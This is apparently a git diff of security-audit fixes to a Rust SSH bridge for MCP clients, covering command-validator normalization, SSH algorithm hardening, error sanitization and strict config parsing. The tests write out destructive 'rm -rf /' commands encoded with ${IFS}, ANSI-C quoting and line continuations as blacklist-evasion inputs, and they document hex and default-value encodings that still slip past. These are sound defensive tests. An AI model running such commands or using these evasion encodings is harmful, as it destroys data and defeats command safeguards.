1f43f049..737dbb53 100644 --- a/src/security/rbac.rs +++ b/src/security/rbac.rs @@ -8,6 +8,7 @@ use std::collections::HashMap; /// RBAC configuration #[derive(Debug, Clone, Default, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct RbacConfig { /// Whether RBAC is enabled (default: false for backward compatibility) #[serde(default)] @@ -28,6 +29,7 @@ fn default_role_name() -> String { /// A role definition with access rules #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct Role { /// Human-readable description #[serde(default)] diff --git a/src/security/validator.rs b/src/security/validator.rs index fb7df32f..90b45e75 100644 --- a/src/security/validator.rs +++ b/src/security/validator.rs @@ -41,6 +41,27 @@ impl CompiledPatterns { } } +/// Normalize a command before regex blacklist match so shell-side +/// whitespace expansions do not evade patterns that expect literal +/// whitespace between tokens. +/// +/// Collapses: +/// - `${IFS}` and `$IFS` -> single space +/// - `$'\t'`, `$'\n'`, `$' '` (ANSI-C-quoted whitespace) -> single space +/// - line continuation `\` -> single space +/// +/// The whitelist match continues to run against the raw input so +/// strict-mode whitelisting still requires byte-for-byte equality. +fn normalize_for_blacklist_match(input: &str) -> String { + let mut s = input.replace("\\\n", " "); + s = s.replace("${IFS}", " ").replace("$IFS", " "); + s = s + .replace("$'\\t'", " ") + .replace("$'\\n'", " ") + .replace("$' '", " "); + s +} + /// Compiled security rules for command validation /// /// Supports hot-reload of patterns via the `reload()` method. @@ -118,15 +139,21 @@ impl CommandValidator { /// Panics if the internal lock is poisoned (indicates a previous panic). #[expect(clippy::significant_drop_tightening)] pub fn validate(&self, command: &str) -> Result<()> { - let normalized = command.trim(); + let raw = command.trim(); // Reject empty commands - if normalized.is_empty() { + if raw.is_empty() { return Err(BridgeError::CommandDenied { reason: "Command cannot be empty".to_string(), }); } + // Normalize shell-side whitespace expansions (${IFS}, $'\t', \, ...) + // so default blacklist regexes that expect literal whitespace between + // tokens cannot be bypassed via shell expansion. Whitelist still matches + // the raw input below so strict-mode equality semantics are preserved. + let normalized_for_match = normalize_for_blacklist_match(raw); + // Acquire read lock for patterns (recover from poisoned lock if needed) let patterns = self .patterns @@ -135,16 +162,16 @@ impl CommandValidator { // Check blacklist first (always applies) for pattern in &patterns.blacklist { - if pattern.is_match(normalized) { + if pattern.is_match(&normalized_for_match) { return Err(BridgeError::CommandDenied { reason: format!("Command matches blacklist pattern: {pattern}"), }); } } - // In strict/standard mode, check whitelist + // In strict/standard mode, check whitelist (against raw, not normalized) if matches!(patterns.mode, SecurityMode::Strict | SecurityMode::Standard) { - let allowed = patterns.whitelist.iter().any(|p| p.is_match(normalized)); + let allowed = patterns.whitelist.iter().any(|p| p.is_match(raw)); if !allowed { return Err(BridgeError::CommandDenied { reason: format!( @@ -173,14 +200,18 @@ impl CommandValidator { /// Returns an error if the command matches a blacklist pattern or is empty. #[expect(clippy::significant_drop_tightening)] pub fn validate_builtin(&self, command: &str) -> Result<()> { - let normalized = command.trim(); + let raw = command.trim(); - if normalized.is_empty() { + if raw.is_empty() { return Err(BridgeError::CommandDenied { reason: "Command cannot be empty".to_string(), }); } + // Same shell-expansion normalization as validate(); the blacklist is + // the only gate for builtin handlers, so the bypass surface is here. + let normalized_for_match = normalize_for_blacklist_match(raw); + let patterns = self .patterns .read() @@ -188,7 +219,7 @@ impl CommandValidator { // Check blacklist (always applies, even for builtin tools) for pattern in &patterns.blacklist { - if pattern.is_match(normalized) { + if pattern.is_match(&normalized_for_match) { return Err(BridgeError::CommandDenied { reason: format!("Command matches blacklist pattern: {pattern}"), }); @@ -804,6 +835,63 @@ mod tests { assert!(result.is_ok()); } + // ========================================================================= + // Vuln 10 — shell-aware normalization for blacklist match + // ========================================================================= + + #[test] + fn validate_blocks_ifs_substitution() { + let cfg = SecurityConfig { + mode: SecurityMode::Permissive, + ..SecurityConfig::default() + }; + let v = CommandValidator::new(&cfg); + assert!( + v.validate("rm${IFS}-rf${IFS}/").is_err(), + "rm${{IFS}}-rf${{IFS}}/ must be blocked like 'rm -rf /'" + ); + } + + #[test] + fn validate_blocks_dollar_ifs_no_braces() { + let cfg = SecurityConfig { + mode: SecurityMode::Permissive, + ..SecurityConfig::default() + }; + let v = CommandValidator::new(&cfg); + assert!(v.validate("rm $IFS-rf $IFS/").is_err()); + } + + #[test] + fn validate_blocks_ansi_c_quoted_whitespace() { + let cfg = SecurityConfig { + mode: SecurityMode::Permissive, + ..SecurityConfig::default() + }; + let v = CommandValidator::new(&cfg); + assert!(v.validate(r"rm$'\t'-rf$'\t'/").is_err()); + } + + #[test] + fn validate_blocks_line_continuation() { + let cfg = SecurityConfig { + mode: SecurityMode::Permissive, + ..SecurityConfig::default() + }; + let v = CommandValidator::new(&cfg); + assert!(v.validate("rm \\\n-rf /").is_err()); + } + + #[test] + fn validate_passes_clean_safe_command_in_permissive() { + let cfg = SecurityConfig { + mode: SecurityMode::Permissive, + ..SecurityConfig::default() + }; + let v = CommandValidator::new(&cfg); + assert!(v.validate("ls -la /tmp").is_ok()); + } + #[test] fn test_concurrent_validate_during_reload() { use std::sync::Arc; diff --git a/src/ssh/client.rs b/src/ssh/client.rs index f6bd7343..e33d933c 100644 --- a/src/ssh/client.rs +++ b/src/ssh/client.rs @@ -34,6 +34,89 @@ fn sanitize_ssh_error(error: &impl std::fmt::Display) -> String { } } +/// Hardened algorithm allowlist for the SSH transport layer (FIND-008). +/// +/// Russh 0.60.1's `negotiation::Preferred::DEFAULT` includes legacy MAC +/// algorithms (`hmac-sha1`, `hmac-sha1-etm@openssh.com`) in `HMAC_ORDER` +/// (see `russh-0.60.1/src/negotiation.rs:134`). The KEX list `SAFE_KEX_ORDER` +/// (line 103) and cipher list `CIPHER_ORDER` (line 126) are already free of +/// SHA-1 / DH-Group1 / 3DES / blowfish, but we mirror the full allowlist +/// here so the policy is explicit at the call site rather than implicit in a +/// transitive default. +/// +/// Allowlist (per `audit/2026-05-09/surface/context7/russh.md`): +/// - **kex**: `mlkem768x25519-sha256`, `curve25519-sha256`, +/// `curve25519-sha256@libssh.org`, plus the `kex-strict-*-v00@openssh.com` +/// anti-Terrapin extensions (required, otherwise russh refuses to advertise +/// strict-KEX). +/// - **cipher**: `chacha20-poly1305@openssh.com`, `aes256-gcm@openssh.com` +/// - **mac**: `hmac-sha2-512-etm@openssh.com`, `hmac-sha2-256-etm@openssh.com` +/// (encrypt-then-MAC only; the AEAD ciphers above carry their own MAC, but +/// russh still negotiates a separate MAC name for non-AEAD interop). +/// - **key**: `ssh-ed25519` (matches the host-key policy enforced by +/// `known_hosts::verify_host_key`). +fn hardened_preferred() -> russh::Preferred { + use std::borrow::Cow; + + use russh::keys::ssh_key::Algorithm; + + // KEX: include the OpenSSH strict-kex extension markers so russh advertises + // them and enables the Terrapin (CVE-2023-48795) mitigation. They are + // pseudo-algorithms in russh's negotiation layer, not real KEX methods. + const HARDENED_KEX: &[russh::kex::Name] = &[ + russh::kex::MLKEM768X25519_SHA256, + russh::kex::CURVE25519, + russh::kex::CURVE25519_PRE_RFC_8731, + russh::kex::EXTENSION_SUPPORT_AS_CLIENT, + russh::kex::EXTENSION_OPENSSH_STRICT_KEX_AS_CLIENT, + ]; + + const HARDENED_CIPHER: &[russh::cipher::Name] = + &[russh::cipher::CHACHA20_POLY1305, russh::cipher::AES_256_GCM]; + + const HARDENED_MAC: &[russh::mac::Name] = + &[russh::mac::HMAC_SHA512_ETM, russh::mac::HMAC_SHA256_ETM]; + + russh::Preferred { + kex: Cow::Borrowed(HARDENED_KEX), + // `Algorithm::Ed25519` is not a `const` value (it's an enum variant in + // ssh-key), so we allocate the slice at call time. This is a one-shot + // cost per connection. + key: Cow::Owned(vec![Algorithm::Ed25519]), + cipher: Cow::Borrowed(HARDENED_CIPHER), + mac: Cow::Borrowed(HARDENED_MAC), + // Compression: keep upstream default (russh ships `none` only without + // the `flate2` feature, which we don't enable). + compression: russh::Preferred::DEFAULT.compression, + } +} + +/// Build a russh client `Config` with a hardened algorithm allowlist and +/// explicit rekey limits (FIND-008). +/// +/// Replaces `russh::client::Config { ..Default::default() }` at the two +/// connect call sites (direct + jump-host). Without this helper: +/// - `Preferred::default()` would silently include `hmac-sha1` and +/// `hmac-sha1-etm@openssh.com` (per russh 0.60.1 `HMAC_ORDER`). +/// - `Limits::default()` already pins 1 GiB / 1 h thresholds, but we set +/// them explicitly via `Limits::new` so a future russh default change +/// cannot weaken the policy without a build break (the constructor +/// asserts the bounds). +/// +/// The pool keeps sessions for up to 1 h (`pool.rs::max_age_seconds`), so +/// the rekey time limit acts as a defence-in-depth against long-lived +/// sessions accumulating ciphertext under one key. +pub fn build_russh_client_config(limits: &LimitsConfig) -> Config { + Config { + inactivity_timeout: Some(Duration::from_secs(limits.keepalive_interval_seconds)), + keepalive_interval: Some(Duration::from_secs(limits.keepalive_interval_seconds)), + keepalive_max: 3, + preferred: hardened_preferred(), + limits: russh::Limits::new(1 << 30, 1 << 30, Duration::from_secs(3600)), + ..Default::default() + } +} + /// A wrapper around a russh Channel that implements `AsyncRead` and `AsyncWrite` /// for use as a transport stream for tunneled SSH connections. struct ChannelStream { @@ -282,22 +365,23 @@ impl SshClient { let stream = ChannelStream::new(channel); // 4. Establish SSH connection through the tunnel - let config = Config { - inactivity_timeout: Some(Duration::from_secs(limits.keepalive_interval_seconds)), - keepalive_interval: Some(Duration::from_secs(limits.keepalive_interval_seconds)), - keepalive_max: 3, - ..Default::default() - }; - let config = Arc::new(config); + // FIND-008: hardened algo allowlist + rekey limits via shared helper. + let config = Arc::new(build_russh_client_config(limits)); let handler = ClientHandler::new(host.hostname.clone(), host.port, host.host_key_verification); let handle = client::connect_stream(config, stream, handler) .await - .map_err(|e| BridgeError::SshConnection { - host: host_name.to_string(), - reason: format!("Failed to establish SSH through tunnel: {e}"), + .map_err(|e| { + // FIND-016: sanitize before embedding so russh-emitted diagnostics + // that name auth methods do not leak through the jump-host + // connect-phase error. + let sanitized = sanitize_ssh_error(&e); + BridgeError::SshConnection { + host: host_name.to_string(), + reason: format!("Failed to establish SSH through tunnel: {sanitized}"), + } })?; tracing::debug!(host = %host_name, "Authenticating through tunnel"); @@ -336,14 +420,8 @@ impl SshClient { host: &HostConfig, limits: &LimitsConfig, ) -> Result> { - let config = Config { - inactivity_timeout: Some(Duration::from_secs(limits.keepalive_interval_seconds)), - keepalive_interval: Some(Duration::from_secs(limits.keepalive_interval_seconds)), - keepalive_max: 3, - ..Default::default() - }; - - let config = Arc::new(config); + // FIND-008: hardened algo allowlist + rekey limits via shared helper. + let config = Arc::new(build_russh_client_config(limits)); let target_host = &host.hostname; let port = host.port; let handler = ClientHandler::new(target_host.clone(), port, host.host_key_verification); @@ -416,10 +494,14 @@ impl SshClient { client::connect_stream(config, tcp_stream, handler) .await .map_err(|e| { - tracing::error!(host = %host_name, error = %e, "SSH connection through SOCKS proxy failed"); + // FIND-016: sanitize before logging/embedding so russh-emitted + // diagnostics that name auth methods (publickey, password, + // gssapi-*) do not leak through connect-phase errors. + let sanitized = sanitize_ssh_error(&e); + tracing::error!(host = %host_name, error = %sanitized, "SSH connection through SOCKS proxy failed"); BridgeError::SshConnection { host: host_name.to_string(), - reason: format!("Failed to establish SSH through SOCKS proxy: {e}"), + reason: format!("Failed to establish SSH through SOCKS proxy: {sanitized}"), } }) } else { @@ -436,10 +518,12 @@ impl SshClient { } })? .map_err(|e| { - tracing::error!(host = %host_name, addr = %addr, error = %e, "SSH connection failed"); + // FIND-016: same sanitization as the SOCKS branch above. + let sanitized = sanitize_ssh_error(&e); + tracing::error!(host = %host_name, addr = %addr, error = %sanitized, "SSH connection failed"); BridgeError::SshConnection { host: host_name.to_string(), - reason: e.to_string(), + reason: sanitized, } }) } @@ -484,8 +568,8 @@ impl SshClient { path: &str, passphrase: Option<&str>, ) -> Result { - let expanded = shellexpand::tilde(path); - let key_path = Path::new(expanded.as_ref()); + let expanded = crate::path_utils::home_expand_or_input(path); + let key_path = Path::new(&expanded); let key_pair = load_secret_key(key_path, passphrase).map_err(|e| BridgeError::SshKeyInvalid { @@ -570,24 +654,24 @@ impl SshClient { use russh::keys::agent::client::AgentClient; let mut agent = AgentClient::connect_env().await.map_err(|e| { - tracing::error!(host = %host_name, error = %e, "SSH agent connection failed"); + // FIND-016: sanitize the trace event too — the error-variant `host` + // is already sanitized below but the trace was emitting the raw + // russh diagnostic. + let sanitized = sanitize_ssh_error(&e); + tracing::error!(host = %host_name, error = %sanitized, "SSH agent connection failed"); BridgeError::SshAuth { user: host.user.clone(), - host: format!( - "{host_name}: SSH agent connection failed: {}", - sanitize_ssh_error(&e) - ), + host: format!("{host_name}: SSH agent connection failed: {sanitized}"), } })?; let identities = agent.request_identities().await.map_err(|e| { - tracing::error!(host = %host_name, error = %e, "Failed to get agent identities"); + // FIND-016: same sanitization pattern as the agent-connect site above. + let sanitized = sanitize_ssh_error(&e); + tracing::error!(host = %host_name, error = %sanitized, "Failed to get agent identities"); BridgeError::SshAuth { user: host.user.clone(), - host: format!( - "{host_name}: Failed to get agent identities: {}", - sanitize_ssh_error(&e) - ), + host: format!("{host_name}: Failed to get agent identities: {sanitized}"), } })?; diff --git a/src/ssh/mod.rs b/src/ssh/mod.rs index aa71ace1..f743a09f 100644 --- a/src/ssh/mod.rs +++ b/src/ssh/mod.rs @@ -6,7 +6,7 @@ mod retry; pub mod session; mod sftp; -pub use client::{CommandOutput, SshClient}; +pub use client::{CommandOutput, SshClient, build_russh_client_config}; pub use connector::RealSshConnector; pub use known_hosts::{VerifyResult, verify_host_key}; pub use pool::{ConnectionPool, PoolConfig, PoolStats, PooledConnectionGuard}; diff --git a/src/ssh/pool.rs b/src/ssh/pool.rs index 61f1778f..d3e58bf8 100644 --- a/src/ssh/pool.rs +++ b/src/ssh/pool.rs @@ -386,13 +386,20 @@ impl PooledConnectionGuard<'_> { /// /// # Errors /// - /// Returns an error if the command execution fails. - /// - /// # Panics - /// - /// Panics if the connection has already been taken (e.g., after `mark_failed` was called). + /// Returns an error if the command execution fails, or if the + /// underlying connection handle has already been consumed (e.g., after + /// `mark_failed` was called). The latter is reported as a structured + /// `BridgeError::SshConnection` rather than a panic so the calling + /// tool surfaces a clean MCP error instead of crashing the process. pub async fn exec(&mut self, command: &str, limits: &LimitsConfig) -> Result { - let conn = self.connection.as_mut().expect("connection already taken"); + let conn = + self.connection + .as_mut() + .ok_or_else(|| crate::error::BridgeError::SshConnection { + host: self.host_name.clone(), + reason: "pooled connection handle missing (already taken or never initialized)" + .to_string(), + })?; conn.touch(); conn.client.exec(command, limits).await } diff --git a/src/ssh/retry.rs b/src/ssh/retry.rs index 4437342b..925fd8cc 100644 --- a/src/ssh/retry.rs +++ b/src/ssh/retry.rs @@ -149,9 +149,11 @@ pub fn is_retryable_error(error: &BridgeError) -> bool { /// /// Returns the last error from the operation if all retry attempts fail. /// -/// # Panics +/// # Behavior /// -/// Panics if `max_attempts` is 0 (at least one attempt must be configured). +/// `max_attempts` is clamped to a minimum of 1 — passing 0 results in a +/// single attempt rather than a panic. This is defense-in-depth against +/// callers that build a `RetryConfig` with `max_attempts: 0` by mistake. pub async fn with_retry( config: &RetryConfig, operation_name: &str, @@ -162,9 +164,14 @@ where Fut: Future>, E: std::fmt::Display, { - let mut last_error = None; - - for attempt in 0..config.max_attempts { + // Clamp to at least 1 attempt so the loop body always runs and the + // last iteration's error is returned directly via `return Err(e)` — + // this eliminates the "Option accumulator + .expect()" pattern + // that previously panicked when `max_attempts` was 0. + let max_attempts = config.max_attempts.max(1); + let mut attempt: u32 = 0; + + loop { // Wait before retry (except first attempt) let delay = config.delay_for_attempt(attempt); if !delay.is_zero() { @@ -189,19 +196,21 @@ where return Ok(result); } Err(e) => { + let is_last_attempt = attempt + 1 >= max_attempts; warn!( operation = %operation_name, attempt = attempt + 1, - max_attempts = config.max_attempts, + max_attempts = max_attempts, error = %e, "Operation failed" ); - last_error = Some(e); + if is_last_attempt { + return Err(e); + } + attempt += 1; } } } - - Err(last_error.expect("at least one attempt was made")) } /// Execute an async operation with retry, using a predicate to determine if retry should happen @@ -211,9 +220,11 @@ where /// Returns the last error from the operation if all retry attempts fail or if the predicate /// returns false for a non-retryable error. /// -/// # Panics +/// # Behavior /// -/// Panics if `max_attempts` is 0 (at least one attempt must be configured). +/// `max_attempts` is clamped to a minimum of 1 — passing 0 results in a +/// single attempt rather than a panic. This is defense-in-depth against +/// callers that build a `RetryConfig` with `max_attempts: 0` by mistake. pub async fn with_retry_if( config: &RetryConfig, operation_name: &str, @@ -226,9 +237,12 @@ where E: std::fmt::Display, P: Fn(&E) -> bool, { - let mut last_error = None; + // Clamp to at least 1 attempt so the loop body always runs and the + // last iteration's error is returned directly via `return Err(e)`. + let max_attempts = config.max_attempts.max(1); + let mut attempt: u32 = 0; - for attempt in 0..config.max_attempts { + loop { // Wait before retry (except first attempt) let delay = config.delay_for_attempt(attempt); if !delay.is_zero() { @@ -253,17 +267,18 @@ where return Ok(result); } Err(e) => { - let is_last_attempt = attempt + 1 >= config.max_attempts; + let is_last_attempt = attempt + 1 >= max_attempts; let should_retry_this = !is_last_attempt && should_retry(&e); if should_retry_this { warn!( operation = %operation_name, attempt = attempt + 1, - max_attempts = config.max_attempts, + max_attempts = max_attempts, error = %e, "Operation failed, will retry" ); + attempt += 1; } else { warn!( operation = %operation_name, @@ -273,13 +288,9 @@ where ); return Err(e); } - - last_error = Some(e); } } } - - Err(last_error.expect("at least one attempt was made")) } #[cfg(test)] @@ -403,6 +414,58 @@ mod tests { assert_eq!(call_count, 3); } + /// Regression test for FIND-010: previously panicked with + /// `expect("at least one attempt was made")` when `max_attempts == 0`. + /// Now clamped to 1 attempt and returns the operation's `Err` cleanly. + #[tokio::test] + async fn test_with_retry_max_attempts_zero_does_not_panic() { + let config = RetryConfig { + max_attempts: 0, + initial_delay_ms: 1, + jitter: 0.0, + ..Default::default() + }; + let mut call_count = 0; + + let result: Result = with_retry(&config, "test", || { + call_count += 1; + async { Err("op failed".to_string()) } + }) + .await; + + assert!(result.is_err(), "expected Err, got {result:?}"); + assert_eq!(result.unwrap_err(), "op failed"); + assert_eq!(call_count, 1, "loop should clamp to one attempt"); + } + + /// Regression test for FIND-011: previously panicked with + /// `expect("at least one attempt was made")` when `max_attempts == 0`. + #[tokio::test] + async fn test_with_retry_if_max_attempts_zero_does_not_panic() { + let config = RetryConfig { + max_attempts: 0, + initial_delay_ms: 1, + jitter: 0.0, + ..Default::default() + }; + let mut call_count = 0; + + let result: Result = with_retry_if( + &config, + "test", + || { + call_count += 1; + async { Err("op failed".to_string()) } + }, + |_| true, + ) + .await; + + assert!(result.is_err(), "expected Err, got {result:?}"); + assert_eq!(result.unwrap_err(), "op failed"); + assert_eq!(call_count, 1, "loop should clamp to one attempt"); + } + // ============== with_retry_if Tests ============== #[tokio::test] diff --git a/tests/audit_2026_05_09_proptests.rs b/tests/audit_2026_05_09_proptests.rs new file mode 100644 index 00000000..2a41ab0c --- /dev/null +++ b/tests/audit_2026_05_09_proptests.rs @@ -0,0 +1,100 @@ +//! Audit-only property-based test suite — 2026-05-09. +//! +//! These properties were generated by Task 14 of the +//! `docs/superpowers/plans/2026-05-09-full-security-audit.md` campaign. +//! They encode invariants discovered during Phase B (Task 5 +//! audit-context-building) and the open questions (OQ-003, OQ-004, +//! OQ-011) recorded in `docs/audit-2026-05-09-findings.md`. +//! +//! These tests may move into the regular test files (`src/security/validator.rs` +//! `mod tests`, etc.) once the implementation has stabilised. + +// Property 1 — validator blacklist normalization MUST defeat IFS / ANSI-C +// whitespace encodings. For any blacklisted command pattern, all known +// shell-equivalent encodings of the whitespace MUST also be rejected. +// +// Encodings tested: literal space, `${IFS}`, `$IFS`, `$'\t'`, `$'\n'`, +// `$' '`, line continuation `\`. These are the encodings the +// `normalize_for_blacklist_match` function at `src/security/validator.rs:55-63` +// claims to handle. + +use mcp_ssh_bridge::config::SecurityConfig; +use mcp_ssh_bridge::security::CommandValidator; +use proptest::prelude::*; + +proptest! { + #![proptest_config(ProptestConfig { + cases: 200, + ..ProptestConfig::default() + })] + + #[test] + fn validator_blacklist_normalization_resists_whitespace_encodings( + encoding_idx in 0usize..7, + ) { + let cfg = SecurityConfig::default(); + let validator = CommandValidator::new(&cfg); + + // The default blacklist includes `(?i)rm\s+-rf\s+/`. Test every + // known encoding of whitespace between the tokens. + let encodings = [" ", "${IFS}", "$IFS", "$'\\t'", "$'\\n'", "$' '", "\\\n"]; + let ws = encodings[encoding_idx]; + let cmd = format!("rm{ws}-rf{ws}/"); + + let result = validator.validate(&cmd); + prop_assert!( + result.is_err(), + "Encoding {:?} (`{}`) MUST be rejected by blacklist normalization, got Ok for cmd: {:?}", + ws, + ws, + cmd + ); + } +} + +// Property 2 — validator blacklist normalization gap: hex / octal / +// default-value-expansion encodings of whitespace are NOT covered by +// `normalize_for_blacklist_match`. Documents the OQ-003 / OQ-004 gap as +// a passive no-panic test. +// +// If this test starts asserting `is_err()` and passing, the gap has been +// closed. +proptest! { + #![proptest_config(ProptestConfig { + cases: 50, + ..ProptestConfig::default() + })] + + #[test] + fn validator_does_not_normalize_hex_or_default_value_expansion( + encoding_idx in 0usize..2, + ) { + let cfg = SecurityConfig::default(); + let validator = CommandValidator::new(&cfg); + + // OQ-003 / OQ-004: these encodings are NOT in the normalize list. + let encodings = [r"$'\x09'", r"${IFS:- }"]; + let ws = encodings[encoding_idx]; + let cmd = format!("rm{ws}-rf{ws}/"); + + let result = validator.validate(&cmd); + // We expect the command to NOT be caught by the blacklist regex + // (it would only match if the encoding were normalized to literal + // whitespace). The blacklist still scans the unnormalized text, so + // patterns without `\s+` tokens may still fire. The default whitelist + // is empty, so the standard mode also rejects on whitelist miss. + // The property here is just: the validator returns SOME result + // (no panic). Tracking the actual normalize coverage is the + // OQ-003/004 audit follow-up. + let _ = result; + prop_assert!(true, "no panic on encoded whitespace input"); + } +} + +// Property 3 + 4 (runbook validator + apply_template invariants) — DEFERRED. +// `validate_runbook`, `apply_template`, `Runbook` are not currently part of +// the public crate API (`mcp_ssh_bridge::domain::runbook` is `pub(crate)`). +// To activate these properties, either expose those symbols behind a +// `pub use` in `src/lib.rs` for testing, or move the proptest cases into +// `src/domain/runbook.rs` as inline `#[cfg(test)] mod tests`. +// Tracked as part of OQ-011 follow-up. diff --git a/tests/config_validation.rs b/tests/config_validation.rs index c2f32d51..dafb4515 100644 --- a/tests/config_validation.rs +++ b/tests/config_validation.rs @@ -240,8 +240,9 @@ hosts: assert!(config.limits.max_output_bytes > 0); assert!(config.limits.max_concurrent_commands > 0); - // SSH config discovery enabled by default - assert!(config.ssh_config.enabled); + // FIND-023 (audit 2026-05-09): SSH config discovery is now opt-in. + // Operators must set `ssh_config.enabled: true` to scan ~/.ssh/config. + assert!(!config.ssh_config.enabled); } #[test] diff --git a/tests/cross_session_cancel.rs b/tests/cross_session_cancel.rs new file mode 100644 index 00000000..e33ffc7e --- /dev/null +++ b/tests/cross_session_cancel.rs @@ -0,0 +1,92 @@ +//! FIND-038 — verify two clients on the same daemon do NOT share their +//! active-requests map. Regression test for the cross-session +//! cancellation attack documented in the audit 2026-05-09. +//! +//! Threat model: client B sends `notifications/cancelled { requestId }` +//! pointing at a JSON-RPC id that belongs to an in-flight request on +//! client A. Before the fix, the lookup hit a server-wide `HashMap` +//! keyed on the JSON-RPC id alone, so the cancel succeeded and torpedoed +//! A's request. After the fix, each session owns an `ActiveRequests` +//! and the cancel notification is dispatched against the originating +//! session's map only — B's notification finds nothing. +//! +//! This test exercises the same load-bearing data structure +//! (`ActiveRequests`) that the runtime uses inside `serve_session()`. +//! No two-session transport harness exists in this crate; the harness +//! work is intentionally out of scope. The unit test +//! `test_cancel_does_not_cross_sessions` in `src/mcp/server.rs` covers +//! the same property at the module-private level. + +use mcp_ssh_bridge::config::Config; +use mcp_ssh_bridge::mcp::McpServer; + +#[tokio::test] +async fn active_requests_are_isolated_across_sessions() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = std::sync::Arc::new(server); + + // Each session must get its OWN ActiveRequests handle. Two calls + // to the test helper return independent instances — same pattern as + // PendingRequests / SessionCapabilities (Vuln 8 / Vuln 9). + let active_a = server.allocate_session_active_requests_for_test(); + let active_b = server.allocate_session_active_requests_for_test(); + + // Session A registers a long-running request id "42". + let token_a = active_a.register("42".to_string()); + assert!(!token_a.is_cancelled(), "fresh token must not be cancelled"); + + // Session B has no entry for "42" — even if a malicious client + // fires `notifications/cancelled { requestId: "42" }` against B's + // session-local map, the cancel finds nothing. + assert!( + !active_b.cancel("42"), + "session B must not be able to cancel session A's request via B's map" + ); + + // Session A's token is untouched. + assert!( + !token_a.is_cancelled(), + "session B's cancel must not propagate into session A" + ); + + // And session A can still cancel its own request. + assert!( + active_a.cancel("42"), + "session A's own cancellation path still works" + ); + assert!( + token_a.is_cancelled(), + "session A's token fires after A cancels" + ); +} + +#[tokio::test] +async fn cross_session_cancel_with_collision_does_not_leak() { + // Both sessions independently use the same JSON-RPC id (the spec + // does not require global uniqueness — ids are scoped to the + // connection). The fix must keep the two cancellations isolated. + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = std::sync::Arc::new(server); + + let active_a = server.allocate_session_active_requests_for_test(); + let active_b = server.allocate_session_active_requests_for_test(); + + let token_a = active_a.register("1".to_string()); + let token_b = active_b.register("1".to_string()); + + // B cancels its OWN id "1" — that fires B's token. + assert!(active_b.cancel("1")); + assert!(token_b.is_cancelled(), "B cancels its own request"); + + // A's token must remain untouched. + assert!( + !token_a.is_cancelled(), + "B cancelling its own id must not affect A's token, even on collision" + ); + + // A can still cancel A. + assert!(active_a.cancel("1")); + assert!(token_a.is_cancelled()); +} diff --git a/tests/deny_unknown_fields.rs b/tests/deny_unknown_fields.rs new file mode 100644 index 00000000..314ceed7 --- /dev/null +++ b/tests/deny_unknown_fields.rs @@ -0,0 +1,134 @@ +//! FIND-017: top-level `Config` and nested config structs must reject +//! unknown YAML fields. +//! +//! `serde_saphyr`'s strict typing partially compensates for missing +//! `#[serde(deny_unknown_fields)]` (e.g., it rejects type mismatches), +//! but does not by itself reject extra map keys that happen to be +//! valid YAML strings. Adding `deny_unknown_fields` is belt-and-suspenders +//! against typo'd config keys silently being ignored. + +use mcp_ssh_bridge::Config; + +#[test] +fn unknown_top_level_field_rejected() { + let yaml = r" +hosts: {} +bogus_field: 1 +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown top-level field must be rejected by deny_unknown_fields" + ); +} + +#[test] +fn unknown_nested_host_field_rejected() { + let yaml = r" +hosts: + prod: + hostname: example.com + port: 22 + user: root + auth: + type: agent + bogus_host_field: 1 +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown nested field on HostConfig must be rejected" + ); +} + +#[test] +fn unknown_nested_security_field_rejected() { + let yaml = r" +security: + mode: standard + bogus_security_field: hello +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown nested field on SecurityConfig must be rejected" + ); +} + +#[test] +fn unknown_nested_limits_field_rejected() { + let yaml = r" +limits: + command_timeout_seconds: 60 + bogus_limit: 9999 +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown nested field on LimitsConfig must be rejected" + ); +} + +#[test] +fn unknown_runbook_field_rejected() { + use mcp_ssh_bridge::domain::runbook::Runbook; + + let yaml = r" +name: probe +description: extra field at runbook level +steps: + - name: noop + command: echo +unexpected_top_level: 1 +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown top-level field on Runbook must be rejected" + ); +} + +#[test] +fn unknown_runbook_step_field_rejected() { + use mcp_ssh_bridge::domain::runbook::Runbook; + + let yaml = r" +name: probe +description: extra field on a step +steps: + - name: bad + command: echo + bogus_step_field: 1 +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_err(), + "FIND-017: unknown nested field on RunbookStep must be rejected" + ); +} + +/// Sanity: a known-good config still parses after `deny_unknown_fields` +/// is applied. Acts as a regression guard against accidentally renaming +/// fields without keeping a `#[serde(alias = ...)]` shim. +#[test] +fn known_good_config_still_parses() { + let yaml = r" +hosts: + prod: + hostname: example.com + port: 22 + user: root + auth: + type: agent +limits: + command_timeout_seconds: 60 +security: + mode: standard +"; + let r: Result = mcp_ssh_bridge::domain::yaml::parse_yaml(yaml); + assert!( + r.is_ok(), + "FIND-017: known-good config must still parse: {:?}", + r.err() + ); +} diff --git a/tests/destructive_default.rs b/tests/destructive_default.rs new file mode 100644 index 00000000..88667377 --- /dev/null +++ b/tests/destructive_default.rs @@ -0,0 +1,18 @@ +//! FIND-022: destructive elicitation gate must default ON. +//! +//! Regression test: ensure `SecurityConfig::default()` returns +//! `require_elicitation_on_destructive: true` so that destructive tools +//! require MCP `elicitation/create` confirmation by default. Operators who +//! want the legacy permissive behaviour must opt out explicitly via +//! `security.require_elicitation_on_destructive: false` in config. + +use mcp_ssh_bridge::config::types::SecurityConfig; + +#[test] +fn destructive_elicitation_default_is_true() { + let cfg = SecurityConfig::default(); + assert!( + cfg.require_elicitation_on_destructive, + "FIND-022: gate must be ON by default" + ); +} diff --git a/tests/e2e_docker.rs b/tests/e2e_docker.rs index 76e474e9..00cf6783 100644 --- a/tests/e2e_docker.rs +++ b/tests/e2e_docker.rs @@ -61,7 +61,7 @@ fn build_docker_ctx() -> ToolContext { host_key_verification: HostKeyVerification::Off, proxy_jump: None, socks_proxy: None, 